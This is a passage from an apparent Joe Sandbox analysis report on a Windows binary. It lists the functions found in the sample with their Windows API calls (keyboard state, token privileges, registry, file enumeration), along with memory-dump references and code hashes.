                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0059D1E2
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0059D20C
                                                                      • SendMessageW.USER32 ref: 0059D22F
                                                                      • ClientToScreen.USER32(?,?), ref: 0059D281
                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0059D2B5
                                                                        • Part of subcall function 005125DB: GetWindowLongW.USER32(?,000000EB), ref: 005125EC
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0059D351
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                      • String ID: @GUI_DRAGID$F$pb]
                                                                      • API String ID: 3977979337-397530752
                                                                      • Opcode ID: 7e31f5eba089a5b152f07df6a361bafa1ba0c0fd1a40d938f1c2fd0675d19296
                                                                      • Instruction ID: a7a2c82ffb141a9e19dd5453dfccc50739e982ad8e58e44f8553e9cb783ca902
                                                                      • Opcode Fuzzy Hash: 7e31f5eba089a5b152f07df6a361bafa1ba0c0fd1a40d938f1c2fd0675d19296
                                                                      • Instruction Fuzzy Hash: 2C429B74204341AFDB20CF28C888AAABFE6FF59350F54091AF596C72B1D731D854EB92
                                                                      Function 00526F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$_memset
                                                                      • String ID: ]\$3cR$DEFINE$P\\$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_R
                                                                      • API String ID: 1357608183-71221989
                                                                      • Opcode ID: 2fd34239c9bed3b0c4d008ba6ebaad287cc2d72f4dd288a1640938efc266588d
                                                                      • Instruction ID: d7d1c05c21fa54706e95cf4cc41802ae2b7bc91fc57971f230532d573b79d64a
                                                                      • Opcode Fuzzy Hash: 2fd34239c9bed3b0c4d008ba6ebaad287cc2d72f4dd288a1640938efc266588d
                                                                      • Instruction Fuzzy Hash: 9893B275E00619DFDB24CF98D881BADBBB1FF49310F24856AE945AB381E7709E81CB50
                                                                      Function 005148D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(00000000,?), ref: 005148DF
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0054D665
                                                                      • IsIconic.USER32(?), ref: 0054D66E
                                                                      • ShowWindow.USER32(?,00000009), ref: 0054D67B
                                                                      • SetForegroundWindow.USER32(?), ref: 0054D685
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0054D69B
                                                                      • GetCurrentThreadId.KERNEL32 ref: 0054D6A2
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0054D6AE
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0054D6BF
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0054D6C7
                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 0054D6CF
                                                                      • SetForegroundWindow.USER32(?), ref: 0054D6D2
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0054D6E7
                                                                      • keybd_event.USER32(00000012,00000000), ref: 0054D6F2
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0054D6FC
                                                                      • keybd_event.USER32(00000012,00000000), ref: 0054D701
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0054D70A
                                                                      • keybd_event.USER32(00000012,00000000), ref: 0054D70F
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0054D719
                                                                      • keybd_event.USER32(00000012,00000000), ref: 0054D71E
                                                                      • SetForegroundWindow.USER32(?), ref: 0054D721
                                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 0054D748
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 4125248594-2988720461
                                                                      • Opcode ID: 772dfabaea2213ead048f4c3bb980e9c6f0a012eab9110059ada8980637c2706
                                                                      • Instruction ID: aeecd372950e5be805896de7ff0af5bae0ab3964fda8e08b2f4ec99eb706290b
                                                                      • Opcode Fuzzy Hash: 772dfabaea2213ead048f4c3bb980e9c6f0a012eab9110059ada8980637c2706
                                                                      • Instruction Fuzzy Hash: 2F315371A40318BBEB206BA19C49FBF7E6CEB54B50F124026FA05EA1D1C6B05951BBB1
                                                                      Function 00568310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 005687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0056882B
                                                                        • Part of subcall function 005687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00568858
                                                                        • Part of subcall function 005687E1: GetLastError.KERNEL32 ref: 00568865
                                                                      • _memset.LIBCMT ref: 00568353
                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 005683A5
                                                                      • CloseHandle.KERNEL32(?), ref: 005683B6
                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005683CD
                                                                      • GetProcessWindowStation.USER32 ref: 005683E6
                                                                      • SetProcessWindowStation.USER32(00000000), ref: 005683F0
                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0056840A
                                                                        • Part of subcall function 005681CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00568309), ref: 005681E0
                                                                        • Part of subcall function 005681CB: CloseHandle.KERNEL32(?,?,00568309), ref: 005681F2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                      • String ID: $default$winsta0
                                                                      • API String ID: 2063423040-1027155976
                                                                      • Opcode ID: e6c72577016fabf9902b4b5bebab2c544fb3ce37419339e97c83f65b5549577d
                                                                      • Instruction ID: 984b4821f26a2224111dede81ccd48c45b123e6edc591026c60aac391aef9926
                                                                      • Opcode Fuzzy Hash: e6c72577016fabf9902b4b5bebab2c544fb3ce37419339e97c83f65b5549577d
                                                                      • Instruction Fuzzy Hash: F8813671900209BFDF119FA4DC49ABEBFB9FF18304F14426AF915A7261DB318A19DB60
                                                                      Function 0057C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0057C78D
                                                                      • FindClose.KERNEL32(00000000), ref: 0057C7E1
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0057C806
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0057C81D
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0057C844
                                                                      • __swprintf.LIBCMT ref: 0057C890
                                                                      • __swprintf.LIBCMT ref: 0057C8D3
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                      • __swprintf.LIBCMT ref: 0057C927
                                                                        • Part of subcall function 00533698: __woutput_l.LIBCMT ref: 005336F1
                                                                      • __swprintf.LIBCMT ref: 0057C975
                                                                        • Part of subcall function 00533698: __flsbuf.LIBCMT ref: 00533713
                                                                        • Part of subcall function 00533698: __flsbuf.LIBCMT ref: 0053372B
                                                                      • __swprintf.LIBCMT ref: 0057C9C4
                                                                      • __swprintf.LIBCMT ref: 0057CA13
                                                                      • __swprintf.LIBCMT ref: 0057CA62
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                      • API String ID: 3953360268-2428617273
                                                                      • Opcode ID: 33665aa2aac5bf86728b361c097462f7ca59d003f5f070389c113b16204f00dc
                                                                      • Instruction ID: cf74cb6a68a87f78a0f3da6505821aafad3a880c0c91084b2482b72a3525d523
                                                                      • Opcode Fuzzy Hash: 33665aa2aac5bf86728b361c097462f7ca59d003f5f070389c113b16204f00dc
                                                                      • Instruction Fuzzy Hash: D6A10CB1408205ABD710EFA4D89ADEFBBECBFD9704F40491DF595C6191EA30DA48CB62
                                                                      Function 0057EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0057EFB6
                                                                      • _wcscmp.LIBCMT ref: 0057EFCB
                                                                      • _wcscmp.LIBCMT ref: 0057EFE2
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0057EFF4
                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0057F00E
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0057F026
                                                                      • FindClose.KERNEL32(00000000), ref: 0057F031
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0057F04D
                                                                      • _wcscmp.LIBCMT ref: 0057F074
                                                                      • _wcscmp.LIBCMT ref: 0057F08B
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0057F09D
                                                                      • SetCurrentDirectoryW.KERNEL32(005C8920), ref: 0057F0BB
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057F0C5
                                                                      • FindClose.KERNEL32(00000000), ref: 0057F0D2
                                                                      • FindClose.KERNEL32(00000000), ref: 0057F0E4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1803514871-438819550
                                                                      • Opcode ID: fafe2a8597b8897d75ee6ad4ebfbdc6d764dec7c3fc1ac3cde43d8d60cc591c4
                                                                      • Instruction ID: f3d6a9065298599250e42c7b1527aac6042a148531b053a17e28e770fd2aff39
                                                                      • Opcode Fuzzy Hash: fafe2a8597b8897d75ee6ad4ebfbdc6d764dec7c3fc1ac3cde43d8d60cc591c4
                                                                      • Instruction Fuzzy Hash: A931C1365012196BCF14DBB4EC4DBEE7BACBF48360F148176E809D2191DB70DA44EB61
                                                                      Function 00590857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00590953
                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0059F910,00000000,?,00000000,?,?), ref: 005909C1
                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00590A09
                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00590A92
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00590DB2
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00590DBF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                      • API String ID: 536824911-966354055
                                                                      • Opcode ID: 14fda3662bff394c9eb512c3e2950a31bb50afe0274e074adf98c31894814093
                                                                      • Instruction ID: ef9b3632c80a554ad17103cc9eb736444991ea0419c046c1c163ccf3058e99bb
                                                                      • Opcode Fuzzy Hash: 14fda3662bff394c9eb512c3e2950a31bb50afe0274e074adf98c31894814093
                                                                      • Instruction Fuzzy Hash: 37028175604612AFDB14EF14C859E6ABBE5FF89310F04885DF85A9B3A2DB30ED41CB81
                                                                      Function 005266E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0D[$0E[$0F[$3cR$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG[$_R
                                                                      • API String ID: 0-1150986482
                                                                      • Opcode ID: 73a0663444963706923bb967893693d3a8dbc12708511c7bbf8bb8c169bb048a
                                                                      • Instruction ID: 0eea03fccd765623e16c5e3ff0fde0e9845accbb7b4d8b680649dde15e8ebef2
                                                                      • Opcode Fuzzy Hash: 73a0663444963706923bb967893693d3a8dbc12708511c7bbf8bb8c169bb048a
                                                                      • Instruction Fuzzy Hash: 1C726E75E00629DBDB14CF59D8907BEBBB5FF49310F14856AE806EB290EB309D81CB94
                                                                      Function 0057F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0057F113
                                                                      • _wcscmp.LIBCMT ref: 0057F128
                                                                      • _wcscmp.LIBCMT ref: 0057F13F
                                                                        • Part of subcall function 00574385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 005743A0
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0057F16E
                                                                      • FindClose.KERNEL32(00000000), ref: 0057F179
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0057F195
                                                                      • _wcscmp.LIBCMT ref: 0057F1BC
                                                                      • _wcscmp.LIBCMT ref: 0057F1D3
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0057F1E5
                                                                      • SetCurrentDirectoryW.KERNEL32(005C8920), ref: 0057F203
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057F20D
                                                                      • FindClose.KERNEL32(00000000), ref: 0057F21A
                                                                      • FindClose.KERNEL32(00000000), ref: 0057F22C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 1824444939-438819550
                                                                      • Opcode ID: 6364542311f360a4ca883d5aad9717689d42ae091c3f0bc1a8dc61df50eea8c0
                                                                      • Instruction ID: c5d35e3c2caa008f5a5c2bd9a8a733f9008bc65f6e1bb25a095cc5c6a1cb7ed8
                                                                      • Opcode Fuzzy Hash: 6364542311f360a4ca883d5aad9717689d42ae091c3f0bc1a8dc61df50eea8c0
                                                                      • Instruction Fuzzy Hash: A731843A500219AADF10DFA4FC49EEE7BACBF45360F154176E808E2191DB30DE55EB54
                                                                      Function 0057A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0057A20F
                                                                      • __swprintf.LIBCMT ref: 0057A231
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0057A26E
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0057A293
                                                                      • _memset.LIBCMT ref: 0057A2B2
                                                                      • _wcsncpy.LIBCMT ref: 0057A2EE
                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0057A323
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0057A32E
                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 0057A337
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0057A341
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                      • String ID: :$\$\??\%s
                                                                      • API String ID: 2733774712-3457252023
                                                                      • Opcode ID: ca4665ec71a795b3a0cef74adcdade2901f2f9d0f1550bf75777aee501d33547
                                                                      • Instruction ID: 0a5a17f66e92ab7a5fe03749037186bca7d33e829935a9fd083553db437e914b
                                                                      • Opcode Fuzzy Hash: ca4665ec71a795b3a0cef74adcdade2901f2f9d0f1550bf75777aee501d33547
                                                                      • Instruction Fuzzy Hash: CB31ADB590410AABDB209FA0EC49FEF3BBCBFC8700F1044B6F508D6161EB7096449B25
                                                                      Function 0057001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00570097
                                                                      • SetKeyboardState.USER32(?), ref: 00570102
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00570122
                                                                      • GetKeyState.USER32(000000A0), ref: 00570139
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00570168
                                                                      • GetKeyState.USER32(000000A1), ref: 00570179
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 005701A5
                                                                      • GetKeyState.USER32(00000011), ref: 005701B3
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 005701DC
                                                                      • GetKeyState.USER32(00000012), ref: 005701EA
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00570213
                                                                      • GetKeyState.USER32(0000005B), ref: 00570221
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: f80578cbb7fc235885292e25db63278a8682e785ad5a488b1f17e2bb632909a7
                                                                      • Instruction ID: 9bc239c6db07efc6961f0c7d666351a05703eec980cd586a2e2e64bc62a72c09
                                                                      • Opcode Fuzzy Hash: f80578cbb7fc235885292e25db63278a8682e785ad5a488b1f17e2bb632909a7
                                                                      • Instruction Fuzzy Hash: 12512F30904788A9FB31DB60A8187EABFF4AF01380F48D59DD5C9571C3DAA49B8CD761
                                                                      Function 005903DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00590E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0058FDAD,?,?), ref: 00590E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005904AC
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0059054B
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 005905E3
                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00590822
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0059082F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 1240663315-0
                                                                      • Opcode ID: 6c092a380e8e2221669759fc02c19deba64638e47842baa2cf4311fa87822118
                                                                      • Instruction ID: 24038dea9ea8497685f6067eb8842c06ab6d2342988c6cd2b98792a06d7c3e42
                                                                      • Opcode Fuzzy Hash: 6c092a380e8e2221669759fc02c19deba64638e47842baa2cf4311fa87822118
                                                                      • Instruction Fuzzy Hash: 99E14D31604215AFCB14DF28C995D6ABBE8FF89314F04896DF84ADB2A1DB30ED45CB91
                                                                      Function 00584164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
